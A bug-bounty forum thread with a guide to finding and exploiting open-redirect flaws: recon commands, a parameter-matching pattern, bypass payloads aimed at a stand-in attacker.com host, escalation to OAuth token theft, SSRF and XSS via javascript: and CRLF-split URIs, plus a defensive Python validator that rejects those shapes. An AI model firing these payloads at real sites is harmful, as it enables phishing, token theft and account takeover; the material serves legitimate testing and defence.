Open Redirection Guide

Identifying possibly vulnerable endpoints:

  • waybackurls + hakrawler + gf

    1. cat subdomains | waybackurls | tee -a urls
    2. cat subdomains | hakrawler -depth 3 -plain | tee -a urls
    3. gf redirect urls

    using redirect.json with gf:

{
    "flags" : "-HanrE",
    "pattern" : "url=|rt=|cgi-bin/redirect.cgi|continue=|dest=|destination=|go=|out=|redir=|redirect_uri=|redirect_url=|return=|return_path=|returnTo=|rurl=|target=|view=|from_url=|load_url=|file_url=|page_url=|file_name=|page=|folder=|folder_url=|login_url=|img_url=|return_url=|return_to=|next=|redirect=|redirect_to=|logout=|checkout=|checkout_url=|goto=|next_page=|file=|load_file="
}
  • Google dorks
    site:domain.com inurl:[PARAMETER] using a parameter list
  • Manual inspection by navigating the webapp and intercepting the requests

Confirm and exploit:

* https://company.com/?redirect=http://attacker.com
* https://company.com/?redirect=http://company.com.attacker.com
* https://company.com/?redirect=https://[email protected]
* https://company.com/?redirect=//attacker.com
* https://company.com/?redirect=http://attacker.com#company.com
* https://company.com/?redirect=http://attacker.com?company.com
* https://company.com/?redirect=http://attacker.com/company.com
* https://company.com/?redirect=http://ⓐⓣⓣⓐⓒⓚⓔⓡ.ⓒⓞⓜ

Using special characters:
① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ 
⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ 
⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ 
⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ 
Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ 
ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ 
⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿ 。

Special characters’ source

Escalating to other vulnerabilities:

Open Redirect + Misconfigured OAuth App => OAuth Token Stealing
Open Redirect + Filtered SSRF => SSRF
Open Redirect + CRLFi => XSS
Open Redirect + javascript URI => XSS

Source

Escalate to XSS

  • https://company.com/?redirect=javascript:alert(1)
  • https://company.com/?redirect=javascript:prompt(1)

Escalate to XSS using CRLFi

  • https://company.com/?redirect=java%0d%0ascript%0d%0a:alert(0)
7 Likes
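A server-side check for the redirect parameter that refuses every payload shape listed in the post (foreign host, subdomain look-alike, userinfo trick, protocol-relative `//host`, `javascript:` URI, CRLF-split scheme, circled-letter hostname with the `。` separator), as an added example that is not from the post or from any of the tools it mentions. The allow-list hosts and the function name are assumptions; the backslash and `///host` cases go slightly beyond the post, since browsers treat both as an authority.

```python
import unicodedata
from urllib.parse import urlsplit, urlunsplit

# Constructed allow-list: the only hosts a redirect may ever land on.
ALLOWED_HOSTS = {"company.com", "www.company.com"}


def safe_redirect_target(raw: str, default: str = "/") -> str:
    """Return `raw` if it is a safe redirect target, otherwise `default`."""
    if not raw:
        return default
    # CR, LF, tab and other control characters: browsers strip some of them
    # out of a scheme (java<CR><LF>script:) and they enable header injection.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in raw):
        return default
    # Normalise the way the browser's IDNA processing will: NFKC maps
    # ⓐⓣⓣⓐⓒⓚⓔⓡ to "attacker", and 。 is a valid label separator.
    candidate = unicodedata.normalize("NFKC", raw).strip().replace("\u3002", ".")
    # Browsers treat a backslash as a slash in http(s) URLs ("/\attacker.com").
    if "\\" in candidate:
        return default
    parts = urlsplit(candidate)
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return default  # javascript:, data:, vbscript:, ...
    if parts.netloc:
        # Absolute or //host form. Refuse any userinfo outright and compare
        # .hostname (port stripped, lower-cased) against the allow-list.
        if "@" in parts.netloc:
            return default
        host = (parts.hostname or "").lower()
        return urlunsplit(parts) if host in ALLOWED_HOSTS else default
    # No authority: accept only a same-origin path with a single leading "/".
    # "///attacker.com" is parsed by browsers as a host even though urlsplit
    # reports an empty netloc, so any leading "//" is refused here.
    if not candidate.startswith("/") or candidate.startswith("//"):
        return default
    return candidate
```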

Thanks so much for pointing out hakrawler! Been looking for a fast go HTTP crawler like this!

Have you tried doing XSS analysis too with kxss? A similar loop?

2 Likes

I haven’t actually used it yet but I saw this tweet the other day and I would like to try it out

1 Like

Looks really interesting.

I’d love to put together a few bug-bounty-esque hacks and automation tips for pentests so I can transfer the bug-finding power of the community into something I can fire off and get alerts for.

It would almost be epic to chain together a bunch of stuff and have it give us Discord notifications through a webhook every time it finds something!

3 Likes

ALSO: Do you happen to know where I can find kxss?

EDIT: Found it, in Tom’s hacks repo.

2 Likes

Yup! tomnomnom’s tools are sick!

1 Like

I don’t know Linux or web but this looks detailed nevertheless!

2 Likes

I think you should use dalfox instead of kxss

2 Likes

Do you find it works better?

What are the key benefits / differentiators that you see?

I’ve seen it and I’ve actually wanted to try it for a long time! So, will do :smile: I also sourced hahwul under the special characters.

2 Likes

You NEED to share your findings when you get some basics up.

1 Like

I didn’t try kxss but I see it as an old thing! So no idea about the difference … but I’m sure you’ll like dalfox :blush:

2 Likes